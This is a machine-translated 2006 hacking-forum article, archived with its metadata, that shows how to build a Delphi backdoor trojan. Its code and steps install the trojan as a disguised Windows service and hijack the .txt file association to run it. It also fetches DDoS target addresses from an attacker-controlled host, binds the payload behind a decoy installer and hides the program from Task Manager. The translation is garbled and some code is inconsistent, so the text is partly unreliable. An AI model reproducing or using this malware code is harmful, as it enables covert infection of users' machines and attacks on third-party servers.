On the development of the system of back door software a few ideas-vulnerability warning-the black bar safety net

2006-10-21T00:00:00

Description

Foreword Now the system of back door software are numerous, but most of them have one common problem, that is, the system load is very easy to be savvy veterans are perceived. And met like“Skynet”or“Jinshan network Dart”network _blank">firewall basically it's over. The other day in the online saw a an article called the Do all in cmd shell on the article inside about the program loaded comparison clever, based on NT 2 0 0 0\XP-so the system basically can already do General. In this I used Delphi, and mimic some of the classic Backdoor software functionality to write a Virus, I hope with you master common AC programming experience, can be considered to review previously learned knowledge:） System load Read to here, estimated that many friends will immediately associate HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and Win. ini in the Load. Yes, but from the practical standpoint, now and then with such a start has been a little behind. And if your program achieve a lot of features, but if in the start aspect out of the question, not a depressing thing? In this case, according to the Do all in cmd shell of the author's ideas, we can write an inf file, use this file to configure a system service program. Thus, our Backdoor can unknowingly with the system service start together. But this scheme has a limitation: only applies to NT\2 0 0 0\XP here is a quote the author of the original: Now, let's use inf to add a system service [Version] Signature="$WINDOWS NT$" [DefaultInstall. Services] AddService=inetsvr,,My_AddService_Name [My_AddService_Name] DisplayName=Windows Internet Service Description=provides on the Internet Information Services Management Support. ServiceType=0x10 StartType=2 ErrorControl=0 ServiceBinary=%11%\inetsvr.exe Save for the inetsvr. inf, and then rundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 the %systemroot%\system32\inetsvr. inf in here I original made a point modified [Note: the%systemroot%is an environment variable assuming your system folder is C:\Windows, then the%systemroot%path is C:\Windows General 9 8 or XP, assuming your system folder is C:\winnt, then the%systemroot%path to C:\winnt for 2K] This example adds a named inetsvr the service is not very like the system comes with the service, Oh on. Some points to note: 1, The last four items are Service type: 0x10 as an independent process services, 0x20 for shared process services such as svchost; and Startup Type: 0 system boot time loading, 1 OS initialization when loaded, and 2 by the SCM, the Service Control Manager to automatically start Action, 3 manual start, 4 disabled. Note that 0 and 1 can only be used for drivers Error control: 0 to ignore, 1 to continue and warning that 2 To switch to the LastKnownGood settings, 3 blue screen. Service program location:%1 1% represents the system32 directory%1 0% indicates that the system directory(WINNT or Windows),% 1 2% of the drive directory system32\drivers and. Other values, see the DDK for. You can also needless to variables directly using the full path Path. This fourth item is a must have. 2, In addition to the examples of the six projects, there are LoadOrderGroup And Dependencies, etc. Not commonly used so no description . 3, The inetsvr behind the two commas, because the middle is omitted not a commonly used parameter flags. To delete a service: [Version] Signature="$WINDOWS NT$" [DefaultInstall. Services] DelService=inetsvr Very simple, isn't it? The following step is to in Delphi calls this inf installation services. We can use the shellExecute function, the specific usage of shellExecute(handle,nil,pchar('rundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 the %systemroot%\system32\inetsvr. inf'),nil,nil,sw_shownormal); I think here sw_shownormal a little not very good, because in this parameter. cmd shell window is visible, don't know you Is there any better way? However, I think the shellExecute function has a benefit-------if the application cannot find the inf, on a computer screen does not have any reflection. Simply put, it is not the message fault: of course, if you are not assured that you can also use the GetWindowsDirectory function to the inf file for the absolute positioning, but here I feel as if none of this is necessary. Doubts: here we are sharing type ServiceType=0x10 belonging to the independent process services. It is estimated that the virus to access the Internet would be subjected _blank">firewall blocker. But like similar svchost and lsass such a shared process services but will not, if we take the ServiceType value to 0x20 I think the situation will change, but here I have no in-depth study. File Association In accordance with the usual practice, we can txt associated text to be modified, the registry key value to point to our backdoors. The code below can do this:） var Trojan: TRegistry; FileExt:String; FileType:String; FileDescription:String; ExecName:String; WinDir:String; begin FileExt:='. txt'; FileType:='text documents'; FileDescription:='text documents'; SetLength(WinDir,1 2 8);//get the Windows directory GetWindowsDirectory(PChar(WinDir),1 2 8); SetLength(WinDir,StrLen(PChar(WinDir))); ExecName:=WinDir+'\system32\inetsvr.exe';//here the inetsvr. exe our virus program Trojan:=TRegistry. Create;//Create the registry object try Backdoor. RootKey:=HKEY_CLASSES_ROOT;//registry root key if not Backdoor. OpenKey(FileExt, True) then Exit; //when created in the registry file types fail when you quit, generally is a registry error Backdoor. WriteString(",FileType);//write the file type of the data Backdoor. CloseKey; if not Backdoor. OpenKey(FileType,True) then//open file of type FileType keyword Exit; Backdoor. WriteString(",FileDescription);//write the file description data if not Backdoor. OpenKey('shell\open\command', True) then//open the sub-key Exit; Backdoor. WriteString(",ExecName); Backdoor. CloseKey;//close the keyword finally Backdoor. Free;//Free the registry object end; end; Thus, as long as the user double-clicks a txt file, our inetsvr. exe will also follow start. Attack control Few days ago on the Internet saw an article about using bat batch file to control the virus program to attack others website for an example. Since I was the one that the instance is not yet fully clear, but we can use other way to instead of the bat. Below we come to realize this process: First, you can apply for a home space that is http://www. attack. com/delphiscn it. Upload an ipaddress. txt document. The content of the 1 9 2. 1 6 8. 0. 1 Here the 1 9 2. 1 6 8. 0. 1 is we want to attack the website address. In Delphi, add the following statement: var ipaddress:integer; NMhttp. Get('http://www.attack.com/Delphiscn/ipaddress.txt'); ipaddress:=strtoint(NMhttp. Body); NMhttp. Free; Thus, our program got to attack the site address IPaddress and the IPAddress by our own control:） The next is concerned to attack, we can be in the program added a piece of code. To 1 9 2. 1 6 8. 0. 1 non-stop to send data packets. Cause the remote server refused to respond, which is often mentioned[DDOS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>a). Of course you can also use a similar Ping such a method, due to the relatively simple, there is no longer dwell. File hidden If you design The program function more powerful, maybe more than one executable file, but we can not be like other shared software to do the setup. One of the most simple method is to use copy/b setup.exe+run.exe set. exe command the need to run the program loaded in the front an executable program behind the setup. the exe file functions there are two, one is to display the artifacts so others don't know this is a Trojan installer, whichThe second is the real object from the specified word length locate the Trojan program to intercept down and run installed, due to Trojan services section uses“stealth”technology, so there will not be perceived, the code portion is to locate the copy here is not fine. There is a method in the resource file RES, pre-loaded Trojans, and in the form of data stored in the current executable file, in the right moment to release. The code below can be used from the RES to release the specified file: procedure runvirus(from:pchar;FiletString); var tempdir:string; Buf:pointer; size:longint; h,ResHandle:Cardinal; zip:File; begin h:=GetModuleHandle(pchar(extractFilename(paramstr(0)))); tempdir:="; reshandle:=FindResource(h,Makeintresource(1),'DAT'); buf:=Pointer(loadresource(h,reshandle)); size:=SizeofResource(h,reshandle); assignfile(zip,tempdir+fileto); rewrite(zip,1); try blockwrite(zip,buf^,size) finally closefile(zip); end; end; Resource file test. rc made as follows: * Contents: 1 DAT "test.exe" * Production: BRCC32 test. rc * In the resource file by adding: {$R *. DFM} //Added to test. RES, if not this line, when the Trojan is released when the file can't find resources error message, be sure to pay attention to this problem:） {$R test. RES} * Function calls: if not Fileexists('test.exe') then runvirus('DAT','test.exe'); In addition, attach a few of the more common tips: The Task Manager in the invisible: We can use the clear title of the method: program Project1; uses Forms, Unit1 in 'Unit1. pas' {Form1}; {$R *. RES} begin //Set here title clear Appilcation. Title:="; Application. Initialize; Application. CreateForm(TForm1,Form1); Application. Run; end. On the toolbar invisible: By using the SetWindowLong function to: SetWindowLong(Application,Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW); To prevent the program from repeatedly running: In making use of port services, often to prevent a program executed repeatedly, because the same parts of the copy at run time will use the same IP address and same port, will inevitably produce conflict. So, in order to prevent program secondary execution. We can be in the program startup event add the following code: Suppose we program the title to Neverland program Neverland; uses Forms,Windows,SysUtils, Neverland-in 'Neverland. pas' {Form1}; {$R *. RES} var hMutex:HWND; Ret:Integer; Begin Application. Initialize; Application. Title:='Neverland'; hMutex:=CreateMutex(nil,False,'Neverland'); Ret:=GetLastError; IF Ret<>ERROR_ALREADY_EXISTS Then Begin Application. CreateForm(TForm1, Form1); Application. Run; End Else ReleaseMutex(hMutex); end

{"type": "myhack58", "references": [], "href": "http://www.myhack58.com/Article/html/3/62/2006/12420.htm", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "edition": 1, "viewCount": 2, "id": "MYHACK58:62200612420", "published": "2006-10-21T00:00:00", "lastseen": "2016-11-13T18:16:26", "reporter": "\u4f5a\u540d", "modified": "2006-10-21T00:00:00", "title": "On the development of the system of back door software a few ideas-vulnerability warning-the black bar safety net", "description": "Foreword \nNow the system of back door software are numerous, but most of them have one common problem, that is, the system load is very easy to be savvy veterans are perceived. And met like\u201cSkynet\u201dor\u201cJinshan network Dart\u201dnetwork _blank\">firewall basically it's over. The other day in the online saw a an article called the Do all in cmd shell on the article inside about the program loaded comparison clever, based on NT 2 0 0 0\\XP-so the system basically can already do General. In this I used Delphi, and mimic some of the classic Backdoor software functionality to write a Virus, I hope with you master common AC programming experience, can be considered to review previously learned knowledge:\uff09\n\nSystem load \nRead to here, estimated that many friends will immediately associate HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run and Win. ini in the Load. Yes, but from the practical standpoint, now and then with such a start has been a little behind. And if your program achieve a lot of features, but if in the start aspect out of the question, not a depressing thing? In this case, according to the Do all in cmd shell of the author's ideas, we can write an inf file, use this file to configure a system service program. Thus, our Backdoor can unknowingly with the system service start together. But this scheme has a limitation: only applies to NT\\2 0 0 0\\XP here is a quote the author of the original:\n\nNow, let's use inf to add a system service \n[Version] \nSignature=\"$WINDOWS NT$\" \n[DefaultInstall. Services] \nAddService=inetsvr,,My_AddService_Name \n[My_AddService_Name] \nDisplayName=Windows Internet Service \nDescription=provides on the Internet Information Services Management Support. \nServiceType=0x10 \nStartType=2 \nErrorControl=0 \nServiceBinary=%11%\\inetsvr.exe \nSave for the inetsvr. inf, and then \nrundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 the %systemroot%\\system32\\inetsvr. inf in here I original made a point modified \n[Note: the%systemroot%is an environment variable assuming your system folder is C:\\Windows, then the%systemroot%path is C:\\Windows General 9 8 or XP, assuming your system folder is C:\\winnt, then the%systemroot%path to C:\\winnt for 2K] \nThis example adds a named inetsvr the service is not very like the system comes with the service, Oh on. \nSome points to note: \n1, The last four items are \nService type: 0x10 as an independent process services, 0x20 for shared process services such as svchost; and \nStartup Type: 0 system boot time loading, 1 OS initialization when loaded, and 2 by the SCM, the Service Control Manager to automatically start \nAction, 3 manual start, 4 disabled. \nNote that 0 and 1 can only be used for drivers \nError control: 0 to ignore, 1 to continue and warning that 2 To switch to the LastKnownGood settings, 3 blue screen. \nService program location:%1 1% represents the system32 directory%1 0% indicates that the system directory(WINNT or Windows),% \n1 2% of the drive directory system32\\drivers and. Other values, see the DDK for. You can also needless to variables directly using the full path \nPath. \nThis fourth item is a must have. \n2, In addition to the examples of the six projects, there are LoadOrderGroup And Dependencies, etc. Not commonly used so no description \n. \n3, The inetsvr behind the two commas, because the middle is omitted not a commonly used parameter flags. \nTo delete a service: \n[Version] \nSignature=\"$WINDOWS NT$\" \n[DefaultInstall. Services] \nDelService=inetsvr \nVery simple, isn't it?\n\nThe following step is to in Delphi calls this inf installation services. We can use the shellExecute function, the specific usage of \nshellExecute(handle,nil,pchar('rundll32.exe setupapi,InstallHinfSection DefaultInstall 1 2 8 the %systemroot%\\system32\\inetsvr. inf'),nil,nil,sw_shownormal); \nI think here sw_shownormal a little not very good, because in this parameter. cmd shell window is visible, don't know you Is there any better way? However, I think the shellExecute function has a benefit-------if the application cannot find the inf, on a computer screen does not have any reflection. Simply put, it is not the message fault: of course, if you are not assured that you can also use the GetWindowsDirectory function to the inf file for the absolute positioning, but here I feel as if none of this is necessary. \nDoubts: here we are sharing type ServiceType=0x10 belonging to the independent process services. It is estimated that the virus to access the Internet would be subjected _blank\">firewall blocker. But like similar svchost and lsass such a shared process services but will not, if we take the ServiceType value to 0x20 I think the situation will change, but here I have no in-depth study.\n\nFile Association \nIn accordance with the usual practice, we can txt associated text to be modified, the registry key value to point to our backdoors. The code below can do this:\uff09 \nvar \nTrojan: TRegistry; \nFileExt:String; \nFileType:String; \nFileDescription:String; \nExecName:String; \nWinDir:String; \nbegin \nFileExt:='. txt'; \nFileType:='text documents'; \nFileDescription:='text documents';\n\nSetLength(WinDir,1 2 8);//get the Windows directory \nGetWindowsDirectory(PChar(WinDir),1 2 8); \nSetLength(WinDir,StrLen(PChar(WinDir))); \nExecName:=WinDir+'\\system32\\inetsvr.exe';//here the inetsvr. exe our virus program\n\nTrojan:=TRegistry. Create;//Create the registry object \ntry \nBackdoor. RootKey:=HKEY_CLASSES_ROOT;//registry root key \nif not Backdoor. OpenKey(FileExt, True) then Exit; //when created in the registry file types fail when you quit, generally is a registry error \nBackdoor. WriteString(\",FileType);//write the file type of the data \nBackdoor. CloseKey;\n\nif not Backdoor. OpenKey(FileType,True) then//open file of type FileType keyword \nExit; \nBackdoor. WriteString(\",FileDescription);//write the file description data \nif not Backdoor. OpenKey('shell\\open\\command', True) then//open the sub-key \nExit; \nBackdoor. WriteString(\",ExecName); \nBackdoor. CloseKey;//close the keyword \nfinally \nBackdoor. Free;//Free the registry object \nend; \nend; \nThus, as long as the user double-clicks a txt file, our inetsvr. exe will also follow start.\n\nAttack control \nFew days ago on the Internet saw an article about using bat batch file to control the virus program to attack others website for an example. Since I was the one that the instance is not yet fully clear, but we can use other way to instead of the bat. Below we come to realize this process: \nFirst, you can apply for a home space that is http://www. attack. com/delphiscn it. Upload an ipaddress. txt document. The content of the 1 9 2. 1 6 8. 0. 1 \nHere the 1 9 2. 1 6 8. 0. 1 is we want to attack the website address. \nIn Delphi, add the following statement: \nvar ipaddress:integer; \nNMhttp. Get('http://www.attack.com/Delphiscn/ipaddress.txt'); \nipaddress:=strtoint(NMhttp. Body); \nNMhttp. Free; \nThus, our program got to attack the site address IPaddress and the IPAddress by our own control:\uff09 \nThe next is concerned to attack, we can be in the program added a piece of code. To 1 9 2. 1 6 8. 0. 1 non-stop to send data packets. Cause the remote server refused to respond, which is often mentioned[DDOS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>a). Of course you can also use a similar Ping such a method, due to the relatively simple, there is no longer dwell. \n\nFile hidden \nIf you design The program function more powerful, maybe more than one executable file, but we can not be like other shared software to do the setup. One of the most simple method is to use copy/b setup.exe+run.exe set. exe command the need to run the program loaded in the front an executable program behind the setup. the exe file functions there are two, one is to display the artifacts so others don't know this is a Trojan installer, whichThe second is the real object from the specified word length locate the Trojan program to intercept down and run installed, due to Trojan services section uses\u201cstealth\u201dtechnology, so there will not be perceived, the code portion is to locate the copy here is not fine. There is a method in the resource file RES, pre-loaded Trojans, and in the form of data stored in the current executable file, in the right moment to release. The code below can be used from the RES to release the specified file: \nprocedure runvirus(from:pchar;FiletString); \nvar \ntempdir:string; \nBuf:pointer; \nsize:longint; \nh,ResHandle:Cardinal; \nzip:File; \nbegin \nh:=GetModuleHandle(pchar(extractFilename(paramstr(0)))); \ntempdir:=\"; \nreshandle:=FindResource(h,Makeintresource(1),'DAT'); \nbuf:=Pointer(loadresource(h,reshandle)); \nsize:=SizeofResource(h,reshandle); \nassignfile(zip,tempdir+fileto); \nrewrite(zip,1); \ntry \nblockwrite(zip,buf^,size) \nfinally \nclosefile(zip); \nend; \nend; \nResource file test. rc made as follows: \n* Contents: 1 DAT \"test.exe\" \n* Production: BRCC32 test. rc \n* In the resource file by adding: \n{$R *. DFM} \n//Added to test. RES, if not this line, when the Trojan is released when the file can't find resources error message, be sure to pay attention to this problem:\uff09 \n{$R test. RES} \n* Function calls: \nif not Fileexists('test.exe') then runvirus('DAT','test.exe'); \nIn addition, attach a few of the more common tips: \nThe Task Manager in the invisible: \nWe can use the clear title of the method: \nprogram Project1; \nuses \nForms, \nUnit1 in 'Unit1. pas' {Form1}; \n{$R *. RES} \nbegin \n//Set here title clear \nAppilcation. Title:=\"; \nApplication. Initialize; \nApplication. CreateForm(TForm1,Form1); \nApplication. Run; \nend. \nOn the toolbar invisible: \nBy using the SetWindowLong function to: \nSetWindowLong(Application,Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW); \nTo prevent the program from repeatedly running: \nIn making use of port services, often to prevent a program executed repeatedly, because the same parts of the copy at run time will use the same IP address and same port, will inevitably produce conflict. So, in order to prevent program secondary execution. We can be in the program startup event add the following code: \nSuppose we program the title to Neverland \nprogram Neverland; \nuses \nForms,Windows,SysUtils, \nNeverland-in 'Neverland. pas' {Form1}; \n{$R *. RES} \nvar \nhMutex:HWND; \nRet:Integer; \nBegin \nApplication. Initialize; \nApplication. Title:='Neverland'; \nhMutex:=CreateMutex(nil,False,'Neverland'); \nRet:=GetLastError; \nIF Ret<>ERROR_ALREADY_EXISTS Then \nBegin \nApplication. CreateForm(TForm1, Form1); \nApplication. Run; \nEnd \nElse \nReleaseMutex(hMutex); \nend", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645413866, "score": 1659770509}}